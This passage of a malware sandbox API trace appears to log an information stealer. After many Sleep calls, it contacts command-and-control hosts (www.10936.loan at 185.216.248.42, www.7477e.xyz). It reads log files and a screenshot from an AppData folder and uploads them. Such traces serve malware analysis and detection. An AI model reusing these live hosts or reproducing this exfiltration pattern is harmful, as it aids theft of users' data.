(dwMilliseconds=0x7d0) [0282.603] Sleep (dwMilliseconds=0x7d0) [0282.604] Sleep (dwMilliseconds=0x7d0) [0282.606] Sleep (dwMilliseconds=0x7d0) [0282.607] Sleep (dwMilliseconds=0x7d0) [0282.609] Sleep (dwMilliseconds=0x7d0) [0282.610] Sleep (dwMilliseconds=0x7d0) [0282.612] Sleep (dwMilliseconds=0x7d0) [0282.613] Sleep (dwMilliseconds=0x7d0) [0282.615] Sleep (dwMilliseconds=0x7d0) [0282.616] Sleep (dwMilliseconds=0x7d0) [0282.618] Sleep (dwMilliseconds=0x7d0) [0282.619] Sleep (dwMilliseconds=0x7d0) [0282.621] Sleep (dwMilliseconds=0x7d0) [0282.622] Sleep (dwMilliseconds=0x7d0) [0282.624] Sleep (dwMilliseconds=0x7d0) [0282.625] Sleep (dwMilliseconds=0x7d0) [0282.627] Sleep (dwMilliseconds=0x7d0) [0282.628] Sleep (dwMilliseconds=0x7d0) [0282.630] Sleep (dwMilliseconds=0x7d0) [0282.631] Sleep (dwMilliseconds=0x7d0) [0282.633] Sleep (dwMilliseconds=0x7d0) [0282.634] Sleep (dwMilliseconds=0x7d0) [0282.636] Sleep (dwMilliseconds=0x7d0) [0282.637] Sleep (dwMilliseconds=0x7d0) [0282.639] Sleep (dwMilliseconds=0x7d0) [0282.640] Sleep (dwMilliseconds=0x7d0) [0282.642] Sleep (dwMilliseconds=0x7d0) [0282.643] Sleep (dwMilliseconds=0x7d0) [0282.645] Sleep (dwMilliseconds=0x7d0) [0282.646] Sleep (dwMilliseconds=0x7d0) [0282.648] Sleep (dwMilliseconds=0x7d0) [0282.649] Sleep (dwMilliseconds=0x7d0) [0282.651] Sleep (dwMilliseconds=0x7d0) [0282.652] Sleep (dwMilliseconds=0x7d0) [0282.654] Sleep (dwMilliseconds=0x7d0) [0282.655] Sleep (dwMilliseconds=0x7d0) [0282.657] Sleep (dwMilliseconds=0x7d0) [0282.658] Sleep (dwMilliseconds=0x7d0) [0282.660] Sleep (dwMilliseconds=0x7d0) [0282.661] Sleep (dwMilliseconds=0x7d0) [0282.663] Sleep (dwMilliseconds=0x7d0) [0282.664] Sleep (dwMilliseconds=0x7d0) [0282.667] Sleep (dwMilliseconds=0x7d0) [0282.669] Sleep (dwMilliseconds=0x7d0) [0282.670] Sleep (dwMilliseconds=0x7d0) [0282.672] Sleep (dwMilliseconds=0x7d0) [0282.673] Sleep (dwMilliseconds=0x7d0) [0282.675] Sleep (dwMilliseconds=0x7d0) [0282.676] Sleep (dwMilliseconds=0x7d0) [0282.678] Sleep (dwMilliseconds=0x7d0) [0282.679] Sleep (dwMilliseconds=0x7d0) [0282.681] Sleep (dwMilliseconds=0x7d0) [0282.682] Sleep (dwMilliseconds=0x7d0) [0282.684] Sleep (dwMilliseconds=0x7d0) [0282.685] Sleep (dwMilliseconds=0x7d0) [0282.687] Sleep (dwMilliseconds=0x7d0) [0282.688] Sleep (dwMilliseconds=0x7d0) [0282.690] Sleep (dwMilliseconds=0x7d0) [0282.691] Sleep (dwMilliseconds=0x7d0) [0282.693] Sleep (dwMilliseconds=0x7d0) [0282.694] Sleep (dwMilliseconds=0x7d0) [0282.696] Sleep (dwMilliseconds=0x7d0) [0282.697] Sleep (dwMilliseconds=0x7d0) [0282.699] Sleep (dwMilliseconds=0x7d0) [0282.700] Sleep (dwMilliseconds=0x7d0) [0282.702] Sleep (dwMilliseconds=0x7d0) [0282.703] Sleep (dwMilliseconds=0x7d0) [0282.705] Sleep (dwMilliseconds=0x7d0) [0282.706] Sleep (dwMilliseconds=0x7d0) [0282.708] Sleep (dwMilliseconds=0x7d0) [0282.709] Sleep (dwMilliseconds=0x7d0) [0282.711] Sleep (dwMilliseconds=0x7d0) [0282.712] Sleep (dwMilliseconds=0x7d0) [0282.714] Sleep (dwMilliseconds=0x7d0) [0282.715] Sleep (dwMilliseconds=0x7d0) [0282.717] Sleep (dwMilliseconds=0x7d0) [0282.718] Sleep (dwMilliseconds=0x7d0) [0282.720] Sleep (dwMilliseconds=0x7d0) [0282.721] Sleep (dwMilliseconds=0x7d0) [0282.723] Sleep (dwMilliseconds=0x7d0) [0282.724] Sleep (dwMilliseconds=0x7d0) [0282.726] Sleep (dwMilliseconds=0x7d0) [0282.727] Sleep (dwMilliseconds=0x7d0) [0282.729] Sleep (dwMilliseconds=0x7d0) [0282.730] Sleep (dwMilliseconds=0x7d0) [0282.732] Sleep (dwMilliseconds=0x7d0) [0282.733] Sleep (dwMilliseconds=0x7d0) [0282.735] Sleep (dwMilliseconds=0x7d0) [0282.736] Sleep (dwMilliseconds=0x7d0) [0282.738] Sleep (dwMilliseconds=0x7d0) [0282.739] Sleep (dwMilliseconds=0x7d0) [0282.741] Sleep (dwMilliseconds=0x7d0) [0282.742] Sleep (dwMilliseconds=0x7d0) [0282.744] Sleep (dwMilliseconds=0x7d0) [0282.745] Sleep (dwMilliseconds=0x7d0) [0282.747] Sleep (dwMilliseconds=0x7d0) [0282.748] Sleep (dwMilliseconds=0x7d0) [0282.750] Sleep (dwMilliseconds=0x7d0) [0282.751] Sleep (dwMilliseconds=0x7d0) [0282.753] Sleep (dwMilliseconds=0x7d0) [0282.754] Sleep (dwMilliseconds=0x7d0) [0282.756] Sleep (dwMilliseconds=0x7d0) [0282.757] Sleep (dwMilliseconds=0x7d0) [0282.759] Sleep (dwMilliseconds=0x7d0) [0282.760] Sleep (dwMilliseconds=0x7d0) [0282.762] Sleep (dwMilliseconds=0x7d0) [0282.763] Sleep (dwMilliseconds=0x7d0) [0282.765] Sleep (dwMilliseconds=0x7d0) [0282.767] Sleep (dwMilliseconds=0x7d0) [0282.769] Sleep (dwMilliseconds=0x7d0) [0282.770] Sleep (dwMilliseconds=0x7d0) [0282.772] Sleep (dwMilliseconds=0x7d0) [0282.773] Sleep (dwMilliseconds=0x7d0) [0282.775] Sleep (dwMilliseconds=0x7d0) [0282.776] Sleep (dwMilliseconds=0x7d0) [0282.778] Sleep (dwMilliseconds=0x7d0) [0282.779] Sleep (dwMilliseconds=0x7d0) [0282.781] Sleep (dwMilliseconds=0x7d0) [0282.782] Sleep (dwMilliseconds=0x7d0) [0282.784] Sleep (dwMilliseconds=0x7d0) [0282.785] Sleep (dwMilliseconds=0x7d0) [0282.822] Sleep (dwMilliseconds=0x7d0) [0282.824] Sleep (dwMilliseconds=0x7d0) [0282.825] Sleep (dwMilliseconds=0x7d0) [0282.827] Sleep (dwMilliseconds=0x7d0) [0282.828] Sleep (dwMilliseconds=0x7d0) [0282.830] Sleep (dwMilliseconds=0x7d0) [0282.831] Sleep (dwMilliseconds=0x7d0) [0282.833] Sleep (dwMilliseconds=0x7d0) [0282.834] Sleep (dwMilliseconds=0x7d0) [0282.836] Sleep (dwMilliseconds=0x7d0) [0282.837] Sleep (dwMilliseconds=0x7d0) [0282.839] Sleep (dwMilliseconds=0x7d0) [0282.840] Sleep (dwMilliseconds=0x7d0) [0282.842] Sleep (dwMilliseconds=0x7d0) [0282.843] Sleep (dwMilliseconds=0x7d0) [0282.845] socket (af=2, type=1, protocol=6) returned 0x24ac [0282.846] getaddrinfo (in: pNodeName="www.10936.loan", pServiceName="80", pHints=0x8790238*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8790268 | out: ppResult=0x8790268*=0x862c1c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8883b80*(sa_family=2, sin_port=0x50, sin_addr="185.216.248.42"), ai_next=0x0)) returned 0 [0282.854] connect (s=0x24ac, name=0x8883b80*(sa_family=2, sin_port=0x50, sin_addr="185.216.248.42"), namelen=16) returned 0 [0283.141] send (s=0x24ac, buf=0xa10808a*, len=168, flags=0) returned 168 [0283.142] setsockopt (s=0x24ac, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0283.142] recv (in: s=0x24ac, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 495 [0283.415] closesocket (s=0x24ac) returned 0 [0283.416] Sleep (dwMilliseconds=0x7d0) [0283.417] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.417] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0283.418] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0283.418] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0283.418] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.418] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x24ac, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0283.418] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0283.418] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0283.422] NtQueryInformationFile (in: FileHandle=0x24ac, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0283.426] NtReadFile (in: FileHandle=0x24ac, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0283.426] NtClose (Handle=0x24ac) returned 0x0 [0283.426] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.426] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0283.426] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0283.427] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892bbb0) returned 1 [0283.427] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.427] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0283.427] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0283.427] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0283.427] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.427] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0283.427] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0283.427] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0283.427] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.427] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x24ac, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0283.427] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0283.427] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0283.427] NtQueryInformationFile (in: FileHandle=0x24ac, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0283.427] NtReadFile (in: FileHandle=0x24ac, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x6fe, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0283.427] NtClose (Handle=0x24ac) returned 0x0 [0283.427] socket (af=2, type=1, protocol=6) returned 0x24ac [0283.428] connect (s=0x24ac, name=0x8883b80*(sa_family=2, sin_port=0x50, sin_addr="185.216.248.42"), namelen=16) returned 0 [0283.668] RtlIntegerToChar (in: Value=0xc9d, Base=0x0, Length=0x8, String=0x10b3fae8 | out: String="3229") returned 0x0 [0283.668] send (s=0x24ac, buf=0xa0f8c8a*, len=3623, flags=0) returned 3623 [0283.669] closesocket (s=0x24ac) returned 0 [0283.669] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.669] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0283.670] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0283.670] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0283.670] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.670] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x24ac, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0283.670] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0283.670] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0283.670] NtQueryInformationFile (in: FileHandle=0x24ac, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0283.670] NtReadFile (in: FileHandle=0x24ac, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0283.670] NtClose (Handle=0x24ac) returned 0x0 [0283.670] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.670] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0283.670] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0283.670] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b610) returned 1 [0283.670] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.670] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0283.670] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0283.671] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0283.671] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.671] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0x24ac, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0283.671] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0283.671] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b970) returned 1 [0283.671] NtQueryInformationFile (in: FileHandle=0x24ac, IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70) returned 0x0 [0283.671] NtReadFile (in: FileHandle=0x24ac, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa60, Buffer=0x103e984d, BufferLength=0x16987, ByteOffset=0x10b3fa58*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa60, Buffer=0x103e984d*) returned 0x0 [0283.671] NtClose (Handle=0x24ac) returned 0x0 [0283.671] socket (af=2, type=1, protocol=6) returned 0x24ac [0283.671] connect (s=0x24ac, name=0x8883b80*(sa_family=2, sin_port=0x50, sin_addr="185.216.248.42"), namelen=16) returned 0 [0283.937] RtlIntegerToChar (in: Value=0x282fd, Base=0x0, Length=0x8, String=0x10b3fab8 | out: String="164605") returned 0x0 [0283.940] send (s=0x24ac, buf=0x10469840*, len=165001, flags=0) returned 165001 [0283.942] closesocket (s=0x24ac) returned 0 [0283.943] socket (af=2, type=1, protocol=6) returned 0x24ac [0283.943] getaddrinfo (in: pNodeName="www.7477e.xyz", pServiceName="80", pHints=0x87905d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8790608 | out: ppResult=0x8790608*=0x862c4c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8883900*(sa_family=2, sin_port=0x50, sin_addr="104.21.21.144"), ai_next=0x862b7c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884340*(sa_family=2, sin_port=0x50, sin_addr="172.67.199.31"), ai_next=0x0))) returned 0 [0283.948] connect (s=0x24ac, name=0x8883900*(sa_family=2, sin_port=0x50, sin_addr="104.21.21.144"), namelen=16) returned 0 [0283.971] send (s=0x24ac, buf=0xa10808a*, len=167, flags=0) returned 167 [0283.972] 